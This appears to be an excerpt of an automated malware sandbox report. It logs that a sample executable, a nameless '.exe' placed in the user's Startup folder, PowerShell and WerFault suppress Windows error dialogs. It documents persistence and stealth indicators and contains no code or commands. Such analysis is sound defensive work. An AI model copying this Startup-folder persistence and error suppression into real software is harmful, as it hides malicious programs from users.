            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
